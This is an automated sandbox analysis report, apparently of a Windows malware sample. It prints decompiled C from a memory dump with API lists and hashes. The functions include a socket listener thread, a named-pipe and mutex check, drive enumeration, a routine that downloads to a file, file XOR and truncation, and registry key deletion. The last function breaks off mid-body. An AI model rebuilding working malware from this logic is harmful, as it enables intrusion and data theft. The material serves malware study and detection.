      • Part of subcall function 0040CCAF: InternetCloseHandle.WININET(?), ref: 0040CD32
      • Part of subcall function 0040CCAF: InternetCloseHandle.WININET(?), ref: 0040CD3B
      • Part of subcall function 0040CCAF: InternetCloseHandle.WININET(?), ref: 0040CD44
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E56F
    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004BF), ref: 0040E587
    • CloseHandle.KERNEL32(?), ref: 0040E594
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandleInternet$CrackMessageWait$CreateDispatchMultipleObjectObjectsPeekSingleThread
    • String ID:
    • API String ID: 2347300336-0
    • Opcode ID: c9d4906ac4cac94c6d5ec2708af79478019d3f70ed8b87ea935097b356443091
    • Instruction ID: c8079277a89f57f11541ed912d238442748324b0377419b3cbb5a25bb0166a60
    • Opcode Fuzzy Hash: c9d4906ac4cac94c6d5ec2708af79478019d3f70ed8b87ea935097b356443091
    • Instruction Fuzzy Hash: D95153B1904218EBDB10DFE5DD85AEF7BBCAB04358F10493AF115E61D0E7789A44CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 27%
    			E00409E00(void* __eflags) {
    				intOrPtr _v12;
    				short* _v16;
    				char _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				short _v46;
    				char _v48;
    				char _v308;
    				signed int _v312;
    				void* __esi;
    				signed int _t34;
    				intOrPtr* _t40;
    				intOrPtr _t42;
    				intOrPtr _t51;
    				void* _t54;
    				char _t56;
    				signed int _t57;
    				signed int _t59;
    				void* _t61;
    
    				 *0x416a84 =  *0x416a84 | 0xffffffff;
    				_v20 = 0;
    				_v16 = 0x416a94;
    				_v12 = E00409DB4;
    				_t56 = E00410637(__eflags);
    				if(_t56 != 0xffffffff) {
    					_push( &_v24);
    					_push( &_v48);
    					_push(_t56);
    					_v24 = 0x10;
    					if( *0x416dc8() == 0) {
    						asm("rol ax, 0x8");
    						_v20 = _t56;
    						 *0x416a94 = _v46;
    					}
    				}
    				_v32 = 0;
    				_v28 = 0xf4240;
    				L15:
    				while(WaitForSingleObject( *0x416a8c, 0x64) != 0) {
    					_v308 = _v20;
    					_v312 = 1;
    					_t34 =  *0x416dd8(0,  &_v312, 0, 0,  &_v32);
    					__eflags = _t34 - 0xffffffff;
    					if(_t34 == 0xffffffff) {
    						break;
    					}
    					__eflags = _t34;
    					if(_t34 > 0) {
    						while(1) {
    							L14:
    							__eflags = _v312;
    							if(_v312 == 0) {
    								goto L15;
    							}
    							_v312 = _v312 - 1;
    							_t51 =  *((intOrPtr*)(_t61 + _v312 * 4 - 0x130));
    							_t59 = 0;
    							__eflags = 0;
    							_t40 =  &_v20;
    							while(1) {
    								__eflags = _t51 -  *_t40;
    								if(_t51 ==  *_t40) {
    									break;
    								}
    								_t59 = _t59 + 1;
    								_t40 = _t40 + 0xc;
    								__eflags = _t59 - 1;
    								if(_t59 < 1) {
    									continue;
    								}
    								goto L14;
    							}
    							_t60 = _t59 * 0xc;
    							_t54 =  *0x416db0( *((intOrPtr*)(_t61 + _t59 * 0xc - 0x10)), 0, 0);
    							__eflags = _t54 - 0xffffffff;
    							if(_t54 != 0xffffffff) {
    								 *0x416a88 =  *0x416a88 + 1;
    								_t42 = E0040C14A(_t51,  *((intOrPtr*)(_t61 + _t60 - 8)), _t54);
    								__eflags = _t42;
    								if(_t42 == 0) {
    									 *0x416d90(_t54);
    									 *0x416a88 =  *0x416a88 - 1;
    									__eflags =  *0x416a88;
    								}
    							}
    						}
    					}
    				}
    				 *0x416d90(_v20);
    				_t57 =  *0x416a84; // 0x0
    				E004108F5(_t57);
    				 *0x416a88 =  *0x416a88 - 1;
    				_push(0);
    				RtlExitUserThread();
    				return 0;
    			}

    APIs
    • getsockname.WS2_32(00000000,?,?), ref: 00409E42
    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00409E8D
    • accept.WS2_32(?,00000000,00000000), ref: 00409ED2
    • closesocket.WS2_32(00000000), ref: 00409EF4
    • WaitForSingleObject.KERNEL32(00000064), ref: 00409F10
    • closesocket.WS2_32(?), ref: 00409F21
    • RtlExitUserThread.NTDLL(00000000), ref: 00409F39
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: closesocket$ExitObjectSingleThreadUserWaitacceptgetsocknameselect
    • String ID:
    • API String ID: 307878408-0
    • Opcode ID: 7d97cf2f9fc47a91f4a1acfb98d1f74a0355a90613132ee1e7c696aae083b4e2
    • Instruction ID: c7dfa9fbdc4527b471979d489120e727493e09db6b3cb1932efc3a8aa03f3154
    • Opcode Fuzzy Hash: 7d97cf2f9fc47a91f4a1acfb98d1f74a0355a90613132ee1e7c696aae083b4e2
    • Instruction Fuzzy Hash: 99316D719001199BCB10AFA4EC84AEEB77CFF45354F12853AE925F22E1D7349D85CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00411FA8(void* __ecx, void* __edx) {
    				char _v5;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				void* _t20;
    				void* _t29;
    				WCHAR** _t40;
    
    				_t40 = 0x404270;
    				_v24 = 2;
    				do {
    					_t20 = OpenMutexW(0x1f0001, 0,  *_t40);
    					if(_t20 == 0) {
    						goto L13;
    					}
    					CloseHandle(_t20);
    					E00411E85( *_t40, 0xb,  &_v12);
    					_t3 =  &_v16; // 0x40663a
    					E00411E85( *_t40, 0xc, _t3);
    					E00411E85( *_t40, 0xd,  &_v20);
    					E00411E85( *_t40, 3, 0);
    					_v5 = 0;
    					while(1) {
    						_t29 = OpenMutexW(0x1f0001, 0,  *_t40);
    						if(_t29 == 0) {
    							break;
    						}
    						CloseHandle(_t29);
    						Sleep(0x3e8);
    						_v5 = _v5 + 1;
    						if(_v5 < 0xa) {
    							continue;
    						}
    						L12:
    						E0040F0C0(_v12);
    						_t16 =  &_v16; // 0x40663a
    						E0040F0C0( *_t16);
    						_t20 = E0040F0C0(_v20);
    						goto L13;
    					}
    					if(_v12 != 0) {
    						E0040FFBF(_v12);
    					}
    					if(_v16 != 0) {
    						_t12 =  &_v16; // 0x40663a
    						E0040FFBF( *_t12);
    					}
    					if(_v20 != 0) {
    						E0040FFBF(_v20);
    					}
    					goto L12;
    					L13:
    					_t40 =  &(_t40[1]);
    					_t18 =  &_v24;
    					 *_t18 = _v24 - 1;
    				} while ( *_t18 != 0);
    				return _t20;
    			}

    APIs
    • OpenMutexW.KERNEL32(001F0001,00000000,00404270,?,?,00000000), ref: 00411FC8
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411FD7
      • Part of subcall function 00411E85: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,00404270,00000000), ref: 00411EFE
      • Part of subcall function 00411E85: SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 00411F19
      • Part of subcall function 00411E85: WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411F38
      • Part of subcall function 00411E85: ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411F4E
      • Part of subcall function 00411E85: ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 00411F77
      • Part of subcall function 00411E85: CloseHandle.KERNEL32(00000000), ref: 00411F9B
      • Part of subcall function 00411E85: WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00411EE6
    • OpenMutexW.KERNEL32(001F0001,00000000,00404270,00404270,00000003,00000000,00404270,0000000D,?,00404270,0000000C,:f@,00404270,0000000B,?), ref: 00412015
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00412020
    • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 0041202B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FileHandle$Close$MutexNamedOpenPipeRead$CreateSleepStateWaitWrite
    • String ID: :f@
    • API String ID: 2066843493-2479240421
    • Opcode ID: f2493c70b888b87518c15926ffd70129f0f26ccea873ab693eaf89c91049a9c4
    • Instruction ID: 4cdc0b95e9b26056b3b45938b87af851e94e5fa98b4ab3615a2187939c7bc9e9
    • Opcode Fuzzy Hash: f2493c70b888b87518c15926ffd70129f0f26ccea873ab693eaf89c91049a9c4
    • Instruction Fuzzy Hash: 17214A31940249FBDF216FD1DC85AEEBF79AF00344F14457BB640B10A2CBBA4A95DA58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00407351(void* __eax, void* __edi, intOrPtr _a4) {
    				int _t10;
    				void* _t11;
    				intOrPtr _t12;
    				intOrPtr* _t23;
    				int _t24;
    				void* _t26;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				void _t31;
    
    				_t28 = __edi;
    				_t29 = __eax;
    				if(__eax != 0) {
    					L8:
    					_t26 = 0;
    					if(IsBadHugeReadPtr(_t29, 0x14) != 0) {
    						L16:
    						_t10 = IsBadHugeReadPtr(_t29, 0x14);
    						if(_t10 != 0 ||  *((intOrPtr*)(_t29 + 0xc)) == _t10) {
    							L19:
    							_t11 = 0;
    							goto L20;
    						} else {
    							_t11 = _t29;
    							L20:
    							return _t11;
    						}
    					} else {
    						goto L9;
    					}
    					while(1) {
    						L9:
    						_t12 =  *((intOrPtr*)(_t29 + 0xc));
    						if(_t12 == 0) {
    							break;
    						}
    						if(IsBadHugeReadPtr(_t12 + _t28, 2) == 0) {
    							_push(_a4);
    							_push( *((intOrPtr*)(_t29 + 0xc)) + _t28);
    							_t26 = 0;
    							if( *0x416edc() == 0) {
    								goto L16;
    							}
    							L14:
    							_t29 = _t29 + 0x14;
    							if(IsBadHugeReadPtr(_t29, 0x14) == 0) {
    								continue;
    							}
    							break;
    						}
    						_t26 = 1;
    						goto L14;
    					}
    					if(_t26 != 0) {
    						goto L19;
    					}
    					goto L16;
    				}
    				if(IsBadHugeReadPtr(__edi, 4) != 0 ||  *__edi != 0x5a4d) {
    					L12:
    					return 0;
    				} else {
    					_t23 =  *((intOrPtr*)(__edi + 0x3c)) + __edi;
    					if( *_t23 != 0x4550) {
    						goto L12;
    					}
    					_t30 = _t23 + 0x80;
    					_t24 = IsBadHugeReadPtr(_t30, 8);
    					if(_t24 != 0 ||  *((intOrPtr*)(_t30 + 4)) == _t24) {
    						goto L12;
    					} else {
    						_t31 =  *_t30;
    						if(_t31 == 0) {
    							goto L12;
    						}
    						_t29 = __edi + _t31;
    						goto L8;
    					}
    				}
    			}

    APIs
    • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0040735B
    • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 00407385
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004073A2
    • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 004073B8
    • lstrcmpi.KERNEL32(?,00000428), ref: 004073D6
    • IsBadHugeReadPtr.KERNEL32(-00000014,00000014), ref: 004073E6
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004073F7
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: HugeRead$lstrcmpi
    • String ID:
    • API String ID: 1912838836-0
    • Opcode ID: 932394fd2ad01b163ba3c38ad54b399c2d7e6bd9ccc14b9a706df5a70b0caa28
    • Instruction ID: b3a11823fff351b3f278041ecfecef13e10d357448b242704e0bdc62c3aba9ed
    • Opcode Fuzzy Hash: 932394fd2ad01b163ba3c38ad54b399c2d7e6bd9ccc14b9a706df5a70b0caa28
    • Instruction Fuzzy Hash: 60218131F496119BEB314B249C05BA73A98AF10B41B05C436ED45F62D1E778F811EBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00404CEE(intOrPtr* _a4) {
    				short _v14;
    				short _v16;
    				short _v18;
    				short _v20;
    				long _v24;
    				short _t23;
    				short _t24;
    				int _t27;
    				signed char _t33;
    				intOrPtr* _t42;
    
    				SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    				_t42 = _a4;
    				while(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
    					if( *0x416770 != 0) {
    						_v24 = GetLogicalDrives();
    						_t33 = 2;
    						do {
    							if((_v24 & 1 << _t33) == 0) {
    								goto L7;
    							} else {
    								_v20 = (_t33 & 0x000000ff) + 0x41;
    								_t23 = 0x3a;
    								_v18 = _t23;
    								_t24 = 0x5c;
    								_v16 = _t24;
    								_v14 = 0;
    								_t27 = GetDriveTypeW( &_v20);
    								if(_t27 == 3 || _t27 == 2) {
    									E00404AB1( &_v20, _t42);
    									if(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
    										goto L7;
    									}
    								} else {
    									goto L7;
    								}
    							}
    							goto L9;
    							L7:
    							_t33 = _t33 + 1;
    						} while (_t33 < 0x20);
    					}
    				}
    				L9:
    				 *_t42 =  *_t42 - 1;
    				_push(0);
    				return RtlExitUserThread();
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 00404CFC
    • SetThreadPriority.KERNEL32(00000000), ref: 00404D03
    • GetLogicalDrives.KERNEL32 ref: 00404D1C
    • GetDriveTypeW.KERNEL32(?), ref: 00404D60
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404D7F
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404D94
    • RtlExitUserThread.NTDLL(00000000), ref: 00404DA6
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Thread$ObjectSingleWait$CurrentDriveDrivesExitLogicalPriorityTypeUser
    • String ID:
    • API String ID: 97270378-0
    • Opcode ID: c3d73f10137f0e52672fc25392028d378deea9845498f3d829f8cbe401306c3d
    • Instruction ID: fc0e1d1ab0f4fa922a2650a7a9b19b29ae3b4c7ec4a16f6bb5fd70055552e30a
    • Opcode Fuzzy Hash: c3d73f10137f0e52672fc25392028d378deea9845498f3d829f8cbe401306c3d
    • Instruction Fuzzy Hash: 3411D2752443009BD720AF65FC09AAB77A8EFC4721F11853BF959D22E0D734C845CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405647(intOrPtr _a4, intOrPtr _a8) {
    				signed int _v5;
    				char _v6;
    				char _v12;
    				char _v16;
    				char _v20;
    				intOrPtr _t52;
    				intOrPtr _t57;
    				signed int _t58;
    				void* _t61;
    				void* _t66;
    				void* _t69;
    				char _t71;
    				int _t72;
    				void* _t76;
    				void* _t77;
    				intOrPtr _t80;
    				char* _t82;
    				intOrPtr _t84;
    				void* _t86;
    
    				_t71 = 0;
    				_t84 = _a8;
    				_v16 = 0;
    				_v6 = 0;
    				_v20 = 0;
    				_v12 = 0;
    				if(_t84 <= 0) {
    					L43:
    					return _v12 - _t71 + _t84;
    				} else {
    					do {
    						_t80 = _a4;
    						if(_v16 == 0 ||  *((char*)(_t71 + _t80)) != 0x3e) {
    							_t52 =  *((intOrPtr*)(_t71 + _t80));
    							if(_t52 != 0x3c) {
    								if(_v16 != 0 || _v6 != 0 || _t52 == 0xd || _t52 == 0xa || _t52 == 9) {
    									goto L41;
    								} else {
    									if(_t52 != 0x26 || _t84 - _t71 <= 5) {
    										L39:
    										 *((char*)(_v12 + _t80)) =  *((intOrPtr*)(_t71 + _t80));
    										goto L40;
    									} else {
    										_t38 = _t80 + 1; // 0x1
    										if(StrCmpNIA(_t71 + _t38, "nbsp;", 5) != 0) {
    											goto L39;
    										}
    										 *((char*)(_v12 + _t80)) = 0x20;
    										_t71 = _t71 + 5;
    										L40:
    										_v12 = _v12 + 1;
    										goto L41;
    									}
    								}
    							}
    							_t57 = _v16;
    							_v16 = _v16 + 1;
    							if(_t57 != 0) {
    								goto L41;
    							}
    							_t86 = _t84 - _t71;
    							_t16 = _t80 + 1; // 0x1
    							_t82 = _t71 + _t16;
    							if(_v6 == _t57) {
    								if(_t86 <= 6) {
    									L21:
    									_v5 = 0;
    									do {
    										_t58 = _v5 & 0x000000ff;
    										_t22 = _t58 + 0x401dc4; // 0x2020202
    										_t72 =  *_t22 & 0x000000ff;
    										if(_t86 <= _t72) {
    											goto L27;
    										}
    										if(StrCmpNIA(_t82,  *(0x401db4 + _t58 * 4), _t72) != 0) {
    											_t61 = 0;
    										} else {
    											_t61 = E00405626(_t82, _t72);
    										}
    										if(_t61 != 0) {
    											_t30 =  &(("\n\n\n script")[_v5 & 0x000000ff]); // 0x200a0a0a
    											_t71 = _v20;
    											 *((char*)(_v12 + _a4)) =  *_t30;
    											goto L40;
    										}
    										L27:
    										_v5 = _v5 + 1;
    									} while (_v5 < 4);
    									_t71 = _v20;
    									goto L41;
    								}
    								if(StrCmpNIA(_t82, "script", 6) != 0) {
    									_t66 = 0;
    								} else {
    									_t76 = 6;
    									_t66 = E00405626(_t82, _t76);
    								}
    								if(_t66 == 0) {
    									goto L21;
    								} else {
    									_v6 = 1;
    									goto L41;
    								}
    							}
    							if(_t86 > 7 &&  *_t82 == 0x2f) {
    								_t83 =  &(_t82[1]);
    								if(StrCmpNIA( &(_t82[1]), "script", 6) != 0) {
    									_t69 = 0;
    								} else {
    									_t77 = 6;
    									_t69 = E00405626(_t83, _t77);
    								}
    								if(_t69 != 0) {
    									_v6 = 0;
    								}
    							}
    						} else {
    							_v16 = _v16 - 1;
    						}
    						L41:
    						_t84 = _a8;
    						_t71 = _t71 + 1;
    						_v20 = _t71;
    					} while (_t71 < _t84);
    					goto L43;
    				}
    			}

    APIs
    • StrCmpNIA.SHLWAPI(00000002,script,00000006), ref: 004056BF
    • StrCmpNIA.SHLWAPI(00000001,script,00000006), ref: 004056F5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: nbsp;$script
    • API String ID: 0-298180595
    • Opcode ID: b77c40d9cd3fb344f928d64a7ec8ee8ad9b7bfa879dccbca399a53e4cf986c86
    • Instruction ID: 5fb57be4e081e896d7329a8a17290d86395438bb232dd772598f98f21d70b562
    • Opcode Fuzzy Hash: b77c40d9cd3fb344f928d64a7ec8ee8ad9b7bfa879dccbca399a53e4cf986c86
    • Instruction Fuzzy Hash: 8551D534E04B49EADF214EA984847AFBF71EB01704F0444BBD991773C2C23EA946AF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E004146B2(void** __esi, WCHAR* _a4) {
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				char _v33;
    				void _v36;
    				long _v40;
    				char _v41;
    				void* _t38;
    				int _t50;
    				int _t51;
    				signed int _t53;
    				int _t54;
    				int _t57;
    				signed int _t60;
    				signed int _t61;
    				struct _OVERLAPPED* _t65;
    				struct _OVERLAPPED* _t69;
    				void** _t72;
    
    				_t72 = __esi;
    				_push(_t60);
    				_t69 = 0;
    				_v33 = 0;
    				_t38 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 2, 0);
    				_t61 = _t60 | 0xffffffff;
    				 *__esi = _t38;
    				if(_t38 != _t61) {
    					_push( &_v12);
    					_push(_t38);
    					if( *0x416e90() == 0) {
    						_v28 = _t61;
    						_v24 = _t61;
    					} else {
    						_v28 = _v20;
    						_v24 = _v16;
    					}
    					if((_v28 & _v24) == _t61) {
    						L7:
    						CloseHandle( *_t72);
    						 *_t72 =  *_t72 | 0xffffffff;
    					} else {
    						if((_v28 | _v24) == 0) {
    							L21:
    							_t72[2] = _t72[2] | 0xffffffff;
    							_t34 =  &(_t72[3]);
    							 *_t34 = _t72[3] | 0xffffffff;
    							__eflags =  *_t34;
    							_v41 = 1;
    							E0040FF6F( *_t72, _t69, _t69, _t69);
    						} else {
    							_v20 = _t69;
    							_v16 = _t69;
    							if(ReadFile( *_t72,  &_v36, 5,  &_v40, _t69) != 0) {
    								while(1) {
    									__eflags = _v40 - _t69;
    									if(_v40 == _t69) {
    										goto L21;
    									}
    									__eflags = _v40 - 5;
    									if(_v40 != 5) {
    										L19:
    										_t50 = E0040FF6F( *_t72, _v20, _v16, _t69);
    										__eflags = _t50;
    										if(_t50 == 0) {
    											goto L7;
    										} else {
    											_t51 = SetEndOfFile( *_t72);
    											__eflags = _t51;
    											if(_t51 == 0) {
    												goto L7;
    											} else {
    												goto L21;
    											}
    										}
    									} else {
    										_t53 = _v36 ^ _t72[4];
    										asm("adc edi, [esp+0x24]");
    										_t65 = _t53 + _v20 + 5;
    										asm("adc edi, ecx");
    										_v36 = _t53;
    										__eflags = 0 - _v24;
    										if(__eflags > 0) {
    											L18:
    											_t69 = 0;
    											__eflags = 0;
    											goto L19;
    										} else {
    											if(__eflags < 0) {
    												L14:
    												__eflags = _t53 - 0xa00000;
    												if(_t53 > 0xa00000) {
    													goto L18;
    												} else {
    													_t54 = E0040FF6F( *_t72, _t53, 0, 1);
    													__eflags = _t54;
    													if(_t54 == 0) {
    														goto L7;
    													} else {
    														_v20 = _t65;
    														_v16 = 0;
    														_t57 = ReadFile( *_t72,  &_v36, 5,  &_v40, 0);
    														__eflags = _t57;
    														if(_t57 != 0) {
    															_t69 = 0;
    															__eflags = 0;
    															continue;
    														} else {
    															goto L7;
    														}
    													}
    												}
    											} else {
    												__eflags = _t65 - _v28;
    												if(_t65 > _v28) {
    													goto L18;
    												} else {
    													goto L14;
    												}
    											}
    										}
    									}
    									goto L22;
    								}
    								goto L21;
    							} else {
    								goto L7;
    							}
    						}
    					}
    				}
    				L22:
    				return _v33;
    			}

    APIs
    • CreateFileW.KERNEL32 ref: 004146D4
    • GetFileSizeEx.KERNEL32(00000000,C0000000), ref: 004146ED
    • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000), ref: 00414742
    • CloseHandle.KERNEL32(?), ref: 0041474E
    • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000,?,?,00000000,00000001), ref: 004147C9
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 004147F4
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: 14906b5284d1beb1fa14635eaf3ca3d388e40013574e3d3340364b11de167299
    • Instruction ID: 21e87901e1bdae4b6255ca3af2cedf3ec0c0e1c0502f74571127a0e8c178393f
    • Opcode Fuzzy Hash: 14906b5284d1beb1fa14635eaf3ca3d388e40013574e3d3340364b11de167299
    • Instruction Fuzzy Hash: 58417830108341AFD720DF25CC85AABBBE4FBC9764F154A2EF5E4922A0D735D985CB1A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0040FE88(signed int __eax, void* __ecx, void** __esi, WCHAR* _a4) {
    				intOrPtr _v8;
    				void* _v12;
    				void* _t29;
    				void* _t30;
    				void* _t33;
    				signed int _t34;
    				void* _t37;
    				void* _t38;
    				signed int _t41;
    				signed int _t43;
    
    				_t52 = __esi;
    				_t41 = __eax;
    				asm("sbb eax, eax");
    				_t29 = CreateFileW(_a4, (__eax | 0xfffffffe) << 0x1e,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				__esi[2] = _t29;
    				if(_t29 == 0xffffffff) {
    					L10:
    					_t30 = 0;
    					__eflags = 0;
    				} else {
    					_push( &_v12);
    					_push(_t29);
    					if( *0x416e90() == 0 || _v8 != 0) {
    						L9:
    						CloseHandle(_t52[2]);
    						goto L10;
    					} else {
    						_t33 = _v12;
    						__esi[1] = _t33;
    						if(_t33 != 0) {
    							_push(0);
    							_push(0);
    							_push(0);
    							_t34 = 0;
    							_t43 = _t41 & 0x00000001;
    							_t37 = CreateFileMappingW(__esi[2], 0, (_t34 & 0xffffff00 | __eflags != 0x00000000) + (_t34 & 0xffffff00 | __eflags != 0x00000000) + 2, ??, ??, ??);
    							__esi[3] = _t37;
    							__eflags = _t37;
    							if(_t37 == 0) {
    								goto L9;
    							} else {
    								__eflags = _t43;
    								_t38 = MapViewOfFile(_t37, (_t43 == 0) + (_t43 == 0) + 2, 0, 0, 0);
    								 *__esi = _t38;
    								__eflags = _t38;
    								if(_t38 != 0) {
    									goto L5;
    								} else {
    									CloseHandle(__esi[3]);
    									goto L9;
    								}
    							}
    						} else {
    							__esi[3] = 0;
    							 *__esi = 0;
    							L5:
    							_t30 = 1;
    						}
    					}
    				}
    				return _t30;
    			}

    APIs
    • CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,0041AFD6,?,?,?,0040438B,00416538,025DF908,00000006), ref: 0040FEB4
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FEC7
    • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000), ref: 0040FEFE
    • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FF1B
    • CloseHandle.KERNEL32(?,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FF2A
    • CloseHandle.KERNEL32(?,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FF33
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$CloseCreateHandle$MappingSizeView
    • String ID:
    • API String ID: 2246244431-0
    • Opcode ID: ecb667aaed588f2cb9041de2881a880e26c6dc590171f2096879721f38bb4087
    • Instruction ID: 1d072c1fbab7f138804053e7a7537862a4b02da2011a2d725e0d063e08521f89
    • Opcode Fuzzy Hash: ecb667aaed588f2cb9041de2881a880e26c6dc590171f2096879721f38bb4087
    • Instruction Fuzzy Hash: A521CD75110201AFC7304F66DC4DD6BBBF8EB967107158A3EF056C26A0E6B5D845CA24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FB9A(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
    				char _v5;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				long _v24;
    				void* _t28;
    				long _t37;
    				void* _t41;
    
    				_v5 = 0;
    				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t41 == 0xffffffff) {
    					L15:
    					return _v5;
    				}
    				_t28 = E0040F0A8(0x1000);
    				_v20 = _t28;
    				if(_t28 == 0) {
    					L13:
    					CloseHandle(_t41);
    					if(_v5 == 0) {
    						E0040FFBF(_a8);
    					}
    					goto L15;
    				}
    				_v16 = 0;
    				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
    					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					if(_v12 == 0) {
    						FlushFileBuffers(_t41);
    						_v5 = 1;
    						break;
    					}
    					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
    						break;
    					}
    					_t37 = _v12;
    					if(_t37 != _v24) {
    						break;
    					}
    					_v16 = _v16 + _t37;
    					if(_v16 <= _a12) {
    						continue;
    					}
    					break;
    				}
    				E0040F0C0(_v20);
    				goto L13;
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040FBBA
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FBE8
    • InternetReadFile.WININET(?,?,00001000,?), ref: 0040FC04
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040FC1F
    • FlushFileBuffers.KERNEL32(00000000), ref: 0040FC3F
    • CloseHandle.KERNEL32(00000000), ref: 0040FC52
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 3509176705-0
    • Opcode ID: c39ce7f2de3f4c25de898d7d9cacf3c55dfb10dde89a6287c3ea6ce4aec96b7f
    • Instruction ID: b5af9db788a71a6e6428aa27dc1f93b521d8967994e7e37b8eb6b2c546f22829
    • Opcode Fuzzy Hash: c39ce7f2de3f4c25de898d7d9cacf3c55dfb10dde89a6287c3ea6ce4aec96b7f
    • Instruction Fuzzy Hash: F2219A3190821DABEF21AFA0DC89BEF7B79BB00300F148476F911B2590D3399D498B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C046() {
    				intOrPtr _t7;
    				intOrPtr _t9;
    				intOrPtr _t11;
    				intOrPtr _t14;
    
    				SetThreadPriority(GetCurrentThread(), 2);
    				_t7 =  *0x416c34; // 0x25df5a8
    				_t1 = _t7 + 0x48; // 0x25df739
    				SHDeleteKeyA(0x80000001,  *_t1);
    				_t9 =  *0x416c34; // 0x25df5a8
    				_t2 = _t9 + 0x48; // 0x25df739
    				SHDeleteKeyA(0x80000002,  *_t2);
    				_t11 =  *0x416c34; // 0x25df5a8
    				_t3 = _t11 + 0x4c; // 0x25df979
    				SHDeleteKeyA(0x80000002,  *_t3);
    				Sleep(0x3e8);
